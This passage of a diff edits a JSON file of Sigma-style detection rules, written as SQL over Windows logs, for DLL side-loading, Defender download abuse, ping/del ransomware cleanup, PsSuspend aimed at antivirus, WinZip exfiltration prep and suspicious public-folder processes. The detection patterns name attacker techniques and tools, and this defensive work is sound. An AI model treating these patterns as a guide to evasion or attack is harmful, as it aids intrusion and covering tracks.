LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 
'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", "status": "test", - "description": "Detects processes loading modules related to 
PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835'))" + "SELECT * FROM logs WHERE (EventID = '4688' 
AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": 
"image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", + "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", + "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_winzip_password_compression.yml" }, { - "title": "Potential Wazuh Security Platform DLL 
Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR 